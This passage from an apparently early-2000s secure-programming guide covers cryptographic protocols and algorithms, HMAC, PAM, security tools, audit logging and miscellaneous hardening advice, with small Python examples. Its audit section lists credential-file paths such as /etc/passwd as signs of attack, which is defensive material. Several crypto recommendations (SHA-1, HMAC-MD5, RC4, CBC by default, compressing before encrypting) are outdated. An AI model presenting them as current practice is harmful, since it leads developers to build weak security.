flexibility. Currently there is a slow transition going on from SSLv3 to
TLS, aided because implementations can easily try to use TLS and then
back off to SSLv3 without user intervention. Unfortunately, a few bad
SSLv3 implementations cause problems with the backoff, so you may need a
preferences setting to allow users to skip using TLS if necessary. Don't
use SSL version 2, it has some serious security weaknesses.
SSL/TLS is the primary method for protecting http (web) transactions. Any
time you use an "https://" URL, you're using SSL/TLS. Other protocols
that often use SSL/TLS include POP3 and IMAP. SSL/TLS usually use a
separate TCP/IP port number from the unsecured port, which the IETF is a
little unhappy about (because it consumes twice as many ports; there are
solutions to this). SSL is relatively easy to use in programs, because
most library implementations allow programmers to use operations similar
to the operations on standard sockets like SSL_connect(), SSL_write(),
SSL_read(), etc. A widely used OSS/FS implementation of SSL (as well as
other capabilities) is OpenSSL, available at [http://www.openssl.org]
http://www.openssl.org.
  * OpenPGP and S/MIME. There are two competing, essentially incompatible
standards for securing email: OpenPGP and S/MIME. OpenPGP is based on the
PGP application; an OSS/FS implementation is GNU Privacy Guard from
[http://www.gnupg.org] http://www.gnupg.org. Currently, their
certificates are often not interchangeable; work is ongoing to repair
this.
  * SSH. SSH is the primary method of securing ``remote terminals'' over an
internet, and it also includes methods for tunneling X Windows sessions.
However, it's been extended to support single sign-on and general secure
tunneling for TCP streams, so it's often used for securing other data
streams too (such as CVS accesses). The most popular implementation of
SSH is OpenSSH [http://www.openssh.com] http://www.openssh.com, which is
OSS/FS. Typical use of SSH allows the client to authenticate that the
server is truly the server, and then the user enters a password to
authenticate the user (the password is encrypted and sent to the other
system for verification). Current versions of SSH can store private keys,
allowing users to not enter the password each time. To prevent
man-in-the-middle attacks, SSH records keying information about servers
it talks to; that means that typical use of SSH is vulnerable to a
man-in-the-middle attack during the very first connection, but it can
detect problems afterwards. In contrast, SSL generally uses a certificate
authority, which eliminates the first connection problem but requires
special setup (and payment!) to the certificate authority.
  * Kerberos. Kerberos is a protocol for single sign-on and authenticating
users against a central authentication and key distribution server.
Kerberos works by giving authenticated users "tickets", granting them
access to various services on the network. When clients then contact
servers, the servers can verify the tickets. Kerberos is a primary method
for securing and supporting authentication on a LAN, and for establishing
shared secrets (thus, it needs to be used with other algorithms for the
actual protection of communication). Note that to use Kerberos, both the
client and server have to include code to use it, and since not everyone
has a Kerberos setup, this has to be optional - complicating the use of
Kerberos in some programs. However, Kerberos is widely used.
Many of these protocols allow you to select a number of different algorithms,
so you'll still need to pick reasonable defaults for algorithms (e.g., for
encryption).
-----------------------------------------------------------------------------
11.5.2. Symmetric Key Encryption Algorithms
The use, export, and/or import of implementations of encryption algorithms
are restricted in many countries, and the laws can change quite rapidly. Find
out what the rules are before trying to build applications using
cryptography.
For secret key (bulk data) encryption algorithms, use only encryption
algorithms that have been openly published and withstood years of attack, and
check on their patent status. I would recommend using the new Advanced
Encryption Standard (AES), also known as Rijndael -- a number of
cryptographers have analyzed it and not found any serious weakness in it, and
I believe it has been through enough analysis to be trustworthy now. However,
in August 2002 researchers Fuller and Millan discovered a mathematical
property of the cipher that, while not an attack, might be exploitable into
an attack (the approach may actually have serious consequences for some other
algorithms, too). Thus, it's worth staying tuned to future work. A good
alternative to AES is the Serpent algorithm, which is slightly slower but is
very resistant to attack. For many applications triple-DES is a very good
encryption algorithm; it has a reasonably lengthy key (112 bits), no patent
issues, and a very long history of withstanding attacks (it's withstood
attacks far longer than any other encryption algorithm with reasonable key
length in the public literature, so it's probably the safest
publicly-available symmetric encryption algorithm when properly implemented).
However, triple-DES is very slow when implemented in software, so triple-DES
can be considered ``safest but slowest.'' Twofish appears to be a good
encryption algorithm, but there are some lingering questions - Sean Murphy
and Fauzan Mirza showed that Twofish has properties that cause many academics
to be concerned (though as of yet no one has managed to exploit these
properties). MARS is highly resistant to ``new and novel'' attacks, but it's
more complex and is impractical on small-ability smartcards. For the moment I
would avoid Twofish - it's quite likely that this will never be exploitable,
but it's hard to be sure and there are alternative algorithms which don't
have these concerns. Don't use IDEA - it's subject to U.S. and European
patents. Don't use stupid algorithms such as XOR with a constant or constant
string, the ROT (rotation) scheme, a Vigenère cipher, and so on - these can
be trivially broken with today's computers. Don't use ``double DES'' (using
DES twice) - that's subject to a ``man in the middle'' attack that triple-DES
avoids. Your protocol should support multiple encryption algorithms, anyway;
that way, when an encryption algorithm is broken, users can switch to another
one.
For symmetric-key encryption (e.g., for bulk encryption), don't use a key
length less than 90 bits if you want the information to stay secret through
2016 (add another bit for every additional 18 months of security) [Blaze
1996]. For encrypting worthless data, the old DES algorithm has some value,
but with modern hardware it's too easy to break DES's 56-bit key using brute
force. If you're using DES, don't just use the ASCII text key as the key -
parity is in the least (not most) significant bit, so most DES algorithms
will encrypt using a key value well-known to adversaries; instead, create a
hash of the key and set the parity bits correctly (and pay attention to error
reports from your encryption routine). So-called ``exportable'' encryption
algorithms only have effective key lengths of 40 bits, and are essentially
worthless; in 1996 an attacker could spend $10,000 to break such keys in
twelve minutes or use idle computer time to break them in a few days, with
the time-to-break halving every 18 months in either case.
Block encryption algorithms can be used in a number of different modes, such
as ``electronic code book'' (ECB) and ``cipher block chaining'' (CBC). In
nearly all cases, use CBC, and do not use ECB mode - in ECB mode, the same
block of data always returns the same result inside a stream, and this is
often enough to reveal what's encrypted. Many modes, including CBC mode,
require an ``initialization vector'' (IV). The IV doesn't need to be secret,
but it does need to be unpredictable by an attacker. Don't reuse IV's across
sessions - use a new IV each time you start a session.
There are a number of different streaming encryption algorithms, but many of
them have patent restrictions. I know of no patent or technical issues with
WAKE. RC4 was a trade secret of RSA Data Security Inc; it's been leaked
since, and I know of no real legal impediment to its use, but RSA Data
Security has often threatened court action against users of it (it's not at
all clear what RSA Data Security could do, but no doubt they could tie up
users in worthless court cases). If you use RC4, use it as intended - in
particular, always discard the first 256 bytes it generates, or you'll be
vulnerable to attack. SEAL is patented by IBM - so don't use it. SOBER is
patented; the patent owner has claimed that it will allow many uses for free
if permission is requested, but this creates an impediment for later use.
Even more interestingly, block encryption algorithms can be used in modes
that turn them into stream ciphers, and users who want stream ciphers should
consider this approach (you'll be able to choose between far more
publicly-available algorithms).
-----------------------------------------------------------------------------
11.5.3. Public Key Algorithms
For public key cryptography (used, among other things, for signing and
sending secret keys), there are only a few widely-deployed algorithms. One of
the most widely-used algorithms is RSA; RSA's algorithm was patented, but
only in the U.S., and that patent expired in September 2000, so RSA can be
freely used. Never decrypt or sign a raw value that an attacker gives you
directly using RSA and expose the result, because that could expose the
private key (this isn't a problem in practice, because most protocols involve
signing a hash computed by the user - not the raw value - or don't expose the
result). Never decrypt or sign the exact same raw value multiple times (the
original can be exposed). Both of these can be solved by always adding random
padding (PGP does this) - the usual approach is called Optimal Asymmetric
Encryption Padding (OAEP).
The Diffie-Hellman key exchange algorithm is widely used to permit two
parties to agree on a session key. By itself it doesn't guarantee that the
parties are who they say they are, or that there is no middleman, but it does
strongly help defend against passive listeners; its patent expired in 1997.
If you use Diffie-Hellman to create a shared secret, be sure to hash it first
(there's an attack if you use its shared value directly).
NIST developed the digital signature standard (DSS) (it's a modification of
the ElGamal cryptosystem) for digital signature generation and verification;
one of the conditions for its development was for it to be patent-free.
RSA, Diffie-Hellman, and El Gamal's techniques require more bits for the keys
for equivalent security compared to typical symmetric keys; a 1024-bit key in
these systems is supposed to be roughly equivalent to an 80-bit symmetric
key. A 512-bit RSA key is considered completely unsafe; Nicko van Someren has
demonstrated that such small RSA keys can be factored in 6 weeks using only
already-available office hardware (never mind equipment designed for the
job). In the past, a 1024-bit RSA key was considered reasonably secure, but
recent advancements in factorization algorithms (e.g., by D. J. Bernstein)
have raised concerns that perhaps even 1024 bits is not enough for an RSA
key. Certainly, if your application needs to be highly secure or last beyond
2015, you should use 2048-bit keys.
If you need a public key that requires far fewer bits (e.g., for a
smartcard), then you might use elliptic curve cryptography (IEEE P1363 has
some suggested curves; finding curves is hard). However, be careful -
elliptic curve cryptography isn't patented, but certain speedup techniques
are patented. Elliptic curve cryptography is fast enough that it really
doesn't need these speedups anyway for its usual use of encrypting session /
bulk encryption keys. In general, you shouldn't try to do bulk encryption
with elliptic keys; symmetric algorithms are much faster and are
better-tested for the job.
-----------------------------------------------------------------------------
11.5.4. Cryptographic Hash Algorithms
Some programs need a one-way cryptographic hash algorithm, that is, a
function that takes an ``arbitrary'' amount of data and generates a
fixed-length number that is hard for an attacker to invert (e.g., it's
difficult
for an attacker to create a different set of data to generate that same
value). For a number of years MD5 has been a favorite, but recent efforts
have shown that its 128-bit length may not be enough [van Oorschot 1994] and
that certain attacks weaken MD5's protection [Dobbertin 1996]. Indeed, there
are rumors that a top industry cryptographer has broken MD5, but is bound by
employee agreement to keep silent (see the Bugtraq 22 August 2000 posting by
John Viega). Anyone can create a rumor, but enough weaknesses have been found
that the idea of completing the break is plausible. If you're writing new
code, use SHA-1 instead of MD5. Don't use the original SHA (now called
``SHA-0''); SHA-0 had the same weakness that MD5 does. If you need more bits
in your hash algorithm, use SHA-256, SHA-384, or SHA-512; you can get the
specifications in NIST FIPS PUB 180-2.
-----------------------------------------------------------------------------
11.5.5. Integrity Checking
When communicating, you need some sort of integrity check (don't depend just
on encryption, since an attacker can then induce changes of information to
``random'' values). This can be done with hash algorithms, but don't just use
a hash function directly (this exposes users to an ``extension'' attack - the
attacker can use the hash value, add data of their choosing, and compute the
new hash). The usual approach is ``HMAC'', which computes the integrity check
as
H(k xor opad, H(k xor ipad, data)).
where H is the hash function (typically MD5 or SHA-1) and k is the key. Thus,
integrity checks are often HMAC-MD5 or HMAC-SHA-1. Note that although MD5 has
some weaknesses, as far as I know MD5 isn't vulnerable when used in this
construct, so HMAC-MD5 is (to my knowledge) okay. This is defined in detail
in IETF RFC 2104.
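A minimal sketch of computing and verifying an HMAC with Python's standard
hmac module (the key and message here are illustrative assumptions; the
module implements the RFC 2104 opad/ipad construction internally):

```python
import hashlib
import hmac

key = b"shared-secret-key"  # assumed to be shared in advance
data = b"message needing an integrity check"

# HMAC-SHA-1 as defined in IETF RFC 2104.
tag = hmac.new(key, data, hashlib.sha1).hexdigest()

# The receiver recomputes the tag over the received data and compares
# in constant time; a mismatch means the data (or tag) was altered.
expected = hmac.new(key, data, hashlib.sha1).hexdigest()
print(hmac.compare_digest(tag, expected))  # True
```

Swapping hashlib.sha1 for hashlib.sha256 yields HMAC-SHA-256 with no other
changes.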
Note that in the HMAC approach, a receiver can forge the same data as a
sender. This isn't usually a problem, but if this must be avoided, then use
public key methods and have the sender ``sign'' the data with the sender
private key - this avoids this forging attack, but it's more expensive and
for most environments isn't necessary.
-----------------------------------------------------------------------------
11.5.6. Randomized Message Authentication Mode (RMAC)
NIST has developed and proposed a new mode for using cryptographic algorithms
called [http://www.counterpane.com/crypto-gram-0301.html] Randomized Message
Authentication Code (RMAC). RMAC is intended for use as a message
authentication code technique.
Although there's a formal proof showing that RMAC is secure, the proof
depends on the highly questionable assumption that the underlying
cryptographic algorithm meets the "ideal cipher model" - in particular, that
the algorithm is secure against a variety of specialized attacks, including
related-key attacks. Unfortunately, related-key attacks are poorly studied
for many algorithms; this is not the kind of property or attack that most
people worry about when analyzing cryptographic algorithms. It's known that
triple-DES doesn't have this property, and it's unclear whether other
widely-accepted algorithms like AES have it (it appears that AES is at least
weaker against related-key attacks than against ordinary attacks).
The best advice right now is "don't use RMAC". There are other ways to do
message authentication, such as HMAC combined with a cryptographic hash
algorithm (e.g., HMAC-SHA1). HMAC isn't the same thing (e.g., technically it
doesn't include a nonce, so you should rekey sooner), but the theoretical
weaknesses of HMAC are merely theoretical, while the problems in RMAC seem
far more important in the real world.
-----------------------------------------------------------------------------
11.5.7. Other Cryptographic Issues
You should both encrypt and include integrity checks of data that's
important. Don't depend on the encryption also providing integrity - an
attacker may be able to change the bits into a different value, and although
the attacker may not be able to change it to a specific value, merely
changing the value may be enough. In general, you should use different keys
for integrity and secrecy, to avoid certain subtle attacks.
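One simple way to follow the separate-keys advice is to derive independent
keys from a single master secret using HMAC with distinct labels. This is a
sketch using Python's stdlib (the label strings and master secret are
illustrative assumptions):

```python
import hashlib
import hmac

def derive_key(master: bytes, label: bytes) -> bytes:
    """Derive a purpose-specific key from a master secret.

    Using HMAC with a distinct label per purpose yields independent
    keys, so an attack on the construct using one key doesn't
    directly expose the other."""
    return hmac.new(master, label, hashlib.sha256).digest()

master = b"master secret established by key exchange"
enc_key = derive_key(master, b"encryption")  # used only for secrecy
mac_key = derive_key(master, b"integrity")   # used only for the MAC

print(enc_key != mac_key)  # True: the two keys differ
```

Real protocols typically use a vetted KDF (e.g., HKDF, which is built from
HMAC in essentially this way), but the key-separation principle is the same.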
One issue not discussed often enough is the problem of ``traffic analysis.''
That is, even if messages are encrypted and the encryption is not broken, an
adversary may learn a great deal just from the encrypted messages. For
example, if the presidents of two companies start exchanging many encrypted
email messages, it may suggest that the two companies are considering a
merger. For another example, many SSH implementations have been found to have
a weakness in exchanging passwords: observers could look at packets and
determine the length (or length range) of the password, even if they couldn't
determine the password itself. They could also determine other
information about the password that significantly aided in breaking it.
Be sure to not make it possible to solve a problem in parts, and use
different keys when the trust environment (who is trusted) changes. Don't use
the same key for too long - after a while, change the session key or password
so an adversary will have to start over.
Generally you should compress something you'll encrypt - this does add a
fixed header, which isn't so good, but it eliminates many patterns in the
rest of the message as well as making the result smaller, so it's usually
viewed as a ``win'' if compression is likely to make the result smaller.
In a related note, if you must create your own communication protocol,
examine the problems of what's gone on before. Classics such as Bellovin
[1989]'s review of security problems in the TCP/IP protocol suite might help
you, as well as Bruce Schneier [1998] and Mudge's breaking of Microsoft's
PPTP implementation and their follow-on work. Again, be sure to give any new
protocol widespread public review, and reuse what you can.
-----------------------------------------------------------------------------
11.6. Using PAM
Pluggable Authentication Modules (PAM) is a flexible mechanism for
authenticating users. Many Unix-like systems support PAM, including Solaris,
nearly all Linux distributions (e.g., Red Hat Linux, Caldera, and Debian as
of version 2.2), and FreeBSD as of version 3.1. By using PAM, your program
can be independent of the authentication scheme (passwords, SmartCards,
etc.). Basically, your program calls PAM, which at run-time determines which
``authentication modules'' are required by checking the configuration set by
the local system administrator. If you're writing a program that requires
authentication (e.g., entering a password), you should include support for
PAM. You can find out more about the Linux-PAM project at [http://
www.kernel.org/pub/linux/libs/pam/index.html] http://www.kernel.org/pub/linux
/libs/pam/index.html.
-----------------------------------------------------------------------------
11.7. Tools
Some tools may help you detect security problems before you field the result.
They can't find all such problems, of course, but they can help catch
problems that would otherwise slip by. Here are a few tools, emphasizing open
source / free software tools.
One obvious type of tool is a program to examine the source code to search
for patterns of known potential security problems (e.g., calls to library
functions in ways that are often the source of security vulnerabilities). These
kinds of programs are called ``source code scanners''. Here are a few such
tools:
  * Flawfinder, which I've developed; it's available at [http://
www.dwheeler.com/flawfinder] http://www.dwheeler.com/flawfinder. Flawfinder
scans C/C++ source code for common problems, and is licensed under the GPL.
Unlike RATS, flawfinder is implemented in Python. The developers of RATS and
Flawfinder have agreed to find a way to work together to create a single
``best of breed'' open source program.
  * RATS (Rough Auditing Tool for Security) from Secure Software Solutions is
available at [http://www.securesw.com/rats] http://www.securesw.com/rats.
This program scans C/C++ source code for common problems, and is licensed
under the GPL.
  * ITS4 from Cigital (formerly Reliable Software Technologies, RST) also
statically checks C/C++ code. It is available free for non-commercial
use, including its source code and with certain modification and
redistribution rights. Note that this isn't released as ``open source''
as defined by the Open Source Definition (OSD) - In particular, OSD point
6 forbids ``non-commercial use only'' clauses in open source licenses.
ITS4 is available at [http://www.rstcorp.com/its4] http://www.rstcorp.com
/its4.
  * Splint (formerly named LCLint) is a tool for statically checking C
programs. With minimal effort, splint can be used as a better lint. If
additional effort is invested adding annotations to programs, splint can
perform stronger checking than can be done by any standard lint. For
example, it can be used to statically detect likely buffer overflows. The
software is licensed under the GPL and is available at [http://
www.splint.org] http://www.splint.org.
  * cqual is a type-based analysis tool for finding bugs in C programs. cqual
extends the type system of C with extra user-defined type qualifiers,
e.g., it can note that values are ``tainted'' or ``untainted'' (similar
to Perl's taint checking). The programmer annotates their program in a
few places, and cqual performs qualifier inference to check whether the
annotations are correct. cqual presents the analysis results using
Program Analysis Mode, an emacs-based interface. The current version of
cqual can detect potential format-string vulnerabilities in C programs. A
previous incarnation of cqual, Carillon, has been used to find Y2K bugs
in C programs. The software is licensed under the GPL and is available
from [http://www.cs.berkeley.edu/Research/Aiken/cqual] http://
www.cs.berkeley.edu/Research/Aiken/cqual.
  * Cyclone is a C-like language intended to remove C's security weaknesses.
In theory, you can always switch to a language that is ``more secure,''
but this doesn't always help (a language can help you avoid common
mistakes but it can't read your mind). John Viega has reviewed Cyclone,
and in December 2001 he said: ``Cyclone is definitely a neat language.
It's a C dialect that doesn't feel like it's taking away any power, yet
adds strong safety guarantees, along with numerous features that can be a
real boon to programmers. Unfortunately, Cyclone isn't yet ready for
prime time. Even with crippling limitations aside, it doesn't yet offer
enough advantages over Java (or even C with a good set of tools) to make
it worth the risk of using what is still a very young technology. Perhaps
in a few years, Cyclone will mature into a robust, widely supported
language that comes dangerously close to C in terms of efficiency. If
that day comes, you'll certainly see me abandoning C for good.'' The
Cyclone compiler has been released under the GPL and LGPL. You can get
more information from the [http://www.research.att.com/projects/cyclone]
Cyclone web site.
Some tools try to detect potential security flaws at run-time, either to
counter them or at least to warn the developer about them. Much of Crispin
Cowan's work, such as StackGuard, fits here.
There are several tools that try to detect various C/C++ memory-management
problems; these are really general-purpose software quality improvement
tools, and not specific to security, but memory management problems can
definitely cause security problems. An especially capable tool is [http://
developer.kde.org/~sewardj] Valgrind, which detects various memory-management
problems (such as use of uninitialized memory, reading/writing memory after
it's been free'd, reading/writing off the end of malloc'ed blocks, and memory
leaks). Another such tool is Electric Fence (efence) by Bruce Perens, which
can detect certain memory management errors. [http://www.linkdata.se/
sourcecode.html] Memwatch (public domain) and [http://odin.ac.hmc.edu/
~neldredge/yamd/] YAMD (GPL) can detect memory allocation problems for C and
C++. You can even use the built-in capabilities of the GNU C library's malloc
library, which has the MALLOC_CHECK_ environment variable (see its manual
page for more information). There are many others.
Another approach is to create test patterns and run the program, in an attempt
to find weaknesses in the program. Here are a few such tools:
  * BFBTester, the Brute Force Binary Tester, is licensed under the GPL. This
program does quick security checks of binary programs. BFBTester performs
checks of single and multiple argument command line overflows and
environment variable overflows. Version 2.0 and higher can also watch for
tempfile creation activity (to check for using unsafe tempfile names). At
one time BFBTester didn't run on Linux (due to a technical issue in
Linux's POSIX threads implementation), but this has been fixed as of
version 2.0.1. More information is available at [http://
bfbtester.sourceforge.net/] http://bfbtester.sourceforge.net/
  * The [http://fuzz.sourceforge.net] fuzz program is a tool for testing
other software. It tests programs by bombarding the program being
evaluated with random data. This tool isn't really specific to security.
  * [http://www.immunitysec.com/spike.html] SPIKE is a "fuzzer creation kit",
i.e., it's a toolkit designed to create "random" tests to find security
problems. The SPIKE toolkit is particularly designed for protocol
analysis by simulating network protocol clients, and SPIKE proXy is a
tool built on SPIKE to test web applications. SPIKE includes a few
pre-canned tests. SPIKE is licensed under the GPL.
There are a number of tools that try to give you insight into running programs
that can also be useful when trying to find security problems in your code.
This includes symbolic debuggers (such as gdb) and trace programs (such as
strace and ltrace). One interesting program to support analysis of running
code is [http://razor.bindview.com/tools/fenris] Fenris (GPL license). Its
documentation describes Fenris as a ``multipurpose tracer, stateful analyzer
and partial decompiler intended to simplify bug tracking, security audits,
code, algorithm or protocol analysis - providing a structural program trace,
general information about internal constructions, execution path, memory
operations, I/O, conditional expressions and much more.'' Fenris actually
supplies a whole suite of tools, including extensive forensics capabilities
and a nice debugging GUI for Linux. A list of other promising open source
tools that can be suitable for debugging or code analysis is available at
[http://lcamtuf.coredump.cx/fenris/debug-tools.html] http://
lcamtuf.coredump.cx/fenris/debug-tools.html. Another interesting program
along these lines is Subterfugue, which allows you to control what happens in
every system call made by a program.
If you're building a common kind of product where many standard potential
flaws exist (like an ftp server or firewall), you might find standard
security scanning tools useful. One good one is [http://www.nessus.org]
Nessus; there are many others. These kinds of tools are very useful for doing
regression testing, but since they essentially use a list of past specific
vulnerabilities and common configuration errors, they may not be very helpful
in finding problems in new programs.
Often, you'll need to call on other tools to implement your secure
infrastructure. The [http://ospkibook.sourceforge.net] Open-Source PKI Book
describes a number of open source programs for implementing a public key
infrastructure (PKI).
Of course, running a ``secure'' program on an insecure platform configuration
makes little sense. You may want to examine hardening systems, which attempt
to configure or modify systems to be more resistant to attacks. For Linux,
one hardening system is Bastille Linux, available at [http://
www.bastille-linux.org] http://www.bastille-linux.org.
-----------------------------------------------------------------------------
11.8. Windows CE
If you're securing a Windows CE Device, you should read Maricia Alforque's
"Creating a Secure Windows CE Device" at [http://msdn.microsoft.com/library/
techart/winsecurity.htm] http://msdn.microsoft.com/library/techart/
winsecurity.htm.
-----------------------------------------------------------------------------
11.9. Write Audit Records
Write audit logs for program startup, session startup, and for suspicious
activity. Possible information of value includes date, time, uid, euid, gid,
egid, terminal information, process id, and command line values. You may find
the function syslog(3) helpful for implementing audit logs. One awkward
problem is that any logging system should be able to record a lot of
information (since this information could be very helpful), yet if the
information isn't handled carefully the information itself could be used to
create an attack. After all, the attacker controls some of the input being
sent to the program. When recording data sent by a possible attacker,
identify a list of ``expected'' characters and escape any ``unexpected''
characters so that the log isn't corrupted. Not doing this can be a real
problem; users may include characters such as control characters (especially
NIL or end-of-line) that can cause real problems. For example, if an attacker
embeds a newline, they can then forge log entries by following the newline
with the desired log entry. Sadly, there doesn't seem to be a standard
convention for escaping these characters. I'm partial to the URL escaping
mechanism (%hh where hh is the hexadecimal value of the escaped byte) but
there are others including the C convention (\ooo for the octal value and \X
where X is a special symbol, e.g., \n for newline). There's also the
caret-system (^I is control-I), though that doesn't handle byte values over
127 gracefully.
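A sketch of the URL-style %hh escaping described above, in Python (the
function name and the exact ``expected'' character set are assumptions to
illustrate the idea; choose your own allow-list):

```python
def escape_for_log(data: bytes) -> str:
    """Escape ``unexpected'' bytes using the URL-style %hh convention.

    Only a conservative list of expected characters passes through;
    everything else (control characters such as NIL and newline, bytes
    over 127, and '%' itself so escaping is unambiguous) becomes %hh."""
    expected = set(range(0x20, 0x7f)) - {ord("%")}
    return "".join(
        chr(b) if b in expected else "%%%02X" % b
        for b in data
    )

# An embedded newline can no longer forge a second log entry.
print(escape_for_log(b"user\nFAKE ENTRY"))  # user%0AFAKE ENTRY
```

The escaped string can then be handed safely to syslog(3) or any line-based
log file.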
There is the danger that a user could create a denial-of-service attack (or
at least stop auditing) by performing a very large number of events that cut
an audit record until the system runs out of resources to store the records.
One approach to counter this threat is to rate-limit audit record
recording; intentionally slow down the response rate if ``too many'' audit
records are being cut. You could try to slow the response rate only to the
suspected attacker, but in many situations a single attacker can masquerade
as potentially many users.
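The rate-limiting idea above can be sketched as a token bucket (a common
technique; the class name, rates, and burst size here are illustrative
assumptions): records are allowed while tokens remain, and the caller slows
down, drops, or aggregates records once the bucket empties.

```python
import time

class AuditRateLimiter:
    """Token bucket: allow at most `rate` audit records per second,
    with bursts up to `burst` records. When allow() returns False the
    caller should slow its response or aggregate the record."""

    def __init__(self, rate: float, burst: float):
        self.rate = rate
        self.burst = burst
        self.tokens = burst
        self.last = time.monotonic()

    def allow(self) -> bool:
        now = time.monotonic()
        # Refill tokens in proportion to elapsed time, capped at burst.
        self.tokens = min(self.burst,
                          self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False

limiter = AuditRateLimiter(rate=10.0, burst=5.0)
# 100 rapid events: only about the burst size get through immediately.
accepted = sum(limiter.allow() for _ in range(100))
print(accepted)
```

As the text notes, per-attacker limits are of limited value when one
attacker can masquerade as many users, so a global limit like this is often
the fallback.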
Selecting what is ``suspicious activity'' is, of course, dependent on what
the program does and its anticipated use. Any input that fails the filtering
checks discussed earlier is certainly a candidate (e.g., containing NIL).
Inputs that could not result from normal use should probably be logged, e.g.,
a CGI program where certain required fields are missing in suspicious ways.
Any input with phrases like /etc/passwd or /etc/shadow or the like is very
suspicious in many cases. Similarly, trying to access Windows ``registry''
files or .pwl files is very suspicious.
Do not record passwords in an audit record. Often people accidentally enter
passwords for a different system, so recording a password may allow a system
administrator to break into a different computer outside the administrator's
domain.
-----------------------------------------------------------------------------
11.10. Physical Emissions
Although it's really outside the scope of this book, it's important to
remember that computing and communications equipment leaks a lot of
information, making it hard to really secure. Many people are aware of TEMPEST
requirements which deal with radio frequency emissions of computers,
displays, keyboards, and other components which can be eavesdropped. The
light from displays can also be eavesdropped, even if it's bounced off an
office wall at great distance [Kuhn 2002]. Modem lights are also enough to
determine the underlying communication.
-----------------------------------------------------------------------------
11.11. Miscellaneous
The following are miscellaneous security guidelines that I couldn't seem to
fit anywhere else:
Have your program check at least some of its assumptions before it uses them
(e.g., at the beginning of the program). For example, if you depend on the
``sticky'' bit being set on a given directory, test it; such tests take
little time and could prevent a serious problem. If you worry about the
execution time of some tests on each call, at least perform the test at
installation time, or better yet, at application start-up.
If you have a built-in scripting language, it may be possible for the
language to set an environment variable which adversely affects the program
invoking the script. Defend against this.
If you need a complex configuration language, make sure the language has a
comment character and include a number of commented-out secure examples.
Often '#' is used for commenting, meaning ``the rest of this line is a
comment''.
If possible, don't create setuid or setgid root programs; make the user log
in as root instead.
Sign your code. That way, others can check to see if what's available was
what was sent.
In some applications you may need to worry about timing attacks, where the
variation in timing or CPU utilization is enough to give away important
information. This kind of attack has been used to obtain keying information
from Smartcards, for example. Mauro Lacy has published a paper titled [http:/
/maurol.com.ar/security/RTT.pdf] Remote Timing Techniques, showing that you
can (in some cases) determine over the Internet whether or not a given user id
exists, simply from the effort expended by the CPU (which can be detected
remotely using techniques described in the paper). The only way to deal with
these sorts of problems is to make sure that the same effort is performed
even when it isn't necessary. The problem is that in some cases this may make
the system more vulnerable to a denial of service attack, since it can't
optimize away unnecessary work.
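A small illustration of ``perform the same effort regardless of input'' is
secret comparison: a naive equality check can return as soon as a byte
differs, leaking how much of the prefix matched, while a constant-time
comparison examines every byte. This sketch uses Python's
hmac.compare_digest (the token value is an illustrative assumption):

```python
import hmac

stored_token = b"correct-secret-token"

def check_early_exit(supplied: bytes) -> bool:
    # BAD: `==` may stop at the first differing byte, so response
    # timing leaks how long the matching prefix was.
    return supplied == stored_token

def check_constant_time(supplied: bytes) -> bool:
    # GOOD: compare_digest takes time independent of where (or
    # whether) the inputs differ.
    return hmac.compare_digest(supplied, stored_token)

print(check_constant_time(b"correct-secret-token"))   # True
print(check_constant_time(b"wrong-guess-xxxxxxxxx"))  # False
```

As the text warns, doing the full work even on failure trades a little CPU
for resistance to timing probes.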
Consider statically linking secure programs. This counters attacks on the
dynamic link library mechanism by making sure that the secure programs don't
use it. There are several downsides to this however. This is likely to
increase disk and memory use (from multiple copies of the same routines).
Even worse, it makes updating of libraries (e.g., for security
vulnerabilities) more difficult - in most systems they won't be automatically
updated and have to be tracked and implemented separately.
When reading over code, consider all the cases where a match is not made. For
example, if there is a switch statement, what happens when none of the cases
match? If there is an ``if'' statement, what happens when the condition is
false?
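The ``what happens when nothing matches'' review can be made concrete by
giving every dispatch an explicit, fail-safe default. A sketch in Python
(the command names and table are hypothetical):

```python
def dispatch(command: str) -> str:
    # Hypothetical command table; the point is the explicit default.
    handlers = {
        "status": lambda: "ok",
        "reload": lambda: "reloaded",
    }
    handler = handlers.get(command)
    if handler is None:
        # The no-match case is handled explicitly and fails safe,
        # instead of silently doing nothing (or worse, falling
        # through to something privileged by accident).
        raise ValueError("unrecognized command: %r" % command)
    return handler()

print(dispatch("status"))  # ok
```

The same discipline applies to a C switch statement: always write the
default case, even if it only logs and aborts.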
Merely ``removing'' a file doesn't eliminate the file's data from a disk; on
most systems this simply marks the content as ``deleted'' and makes it
eligible for later reuse, and often data is at least temporarily stored in
other places (such as memory, swap files, and temporary files). Indeed,
against a determined attacker, writing over the data isn't enough. A classic
paper on the problems of erasing magnetic media is Peter Gutmann's paper
[http://www-tac.cisco.com/Support_Library/field_alerts/fn13070.html] ``Secure
Deletion of Data from Magnetic and Solid-State Memory''. A determined
adversary can use other means, too, such as monitoring electromagnetic
emissions from computers (military systems have to obey TEMPEST rules to
overcome this) and/or surreptitious attacks (such as monitors hidden in
keyboards).
When fixing a security vulnerability, consider adding a ``warning'' to detect
and log an attempt to exploit the (now fixed) vulnerability. This will reduce
the likelihood of an attack, especially if there's no way for an attacker to
predetermine if the attack will work, since it exposes an attack in progress.
In short, it turns a vulnerability into an intrusion detection system. This
also suggests that exposing the version of a server program before
authentication is usually a bad idea for security, since doing so makes it
easy for an attacker to only use attacks that would work. Some programs make
it possible for users to intentionally ``lie'' about their version, so that
attackers will use the ``wrong attacks'' and be detected. Also, if the
vulnerability can be triggered over a network, please make sure that security
scanners can detect the vulnerability. I suggest contacting Nessus ([http://
www.nessus.org] http://www.nessus.org) and make sure that their open source
security scanner can detect the problem. That way, users who don't check
their software for upgrades will at least learn about the problem during
their security vulnerability scans (if they do them as they should).
Always include in your documentation contact information for where to report
security problems. You should also support at least one of the common email
addresses for reporting security problems (security-alert@SITE, secure@SITE,
or security@SITE); it's often good to have support@SITE and info@SITE working
as well. Be prepared to support industry practices by those who have a
security flaw to report, such as the [http://www.wiretrip.net/rfp/
policy.html] Full Disclosure Policy (RFPolicy) and the IETF Internet draft,
``Responsible Vulnerability Disclosure Process''. It's important to quickly
work with anyone who is reporting a security flaw; remember that they are
doing you a favor by reporting the problem to you, and that they are under no
obligation to do so. It's especially important, once the problem is fixed, to
give proper credit to the reporter of the flaw (unless they ask otherwise).
Many reporters provide the information solely to gain the credit, and it's
generally accepted that credit is owed to the reporter. Some vendors argue
that people should never report vulnerabilities to the public; the problem
with this argument is that this was once common, and the result was vendors
who denied vulnerabilities while their customers were getting constantly
subverted for years at a time.
Follow best practices and common conventions when leading a software
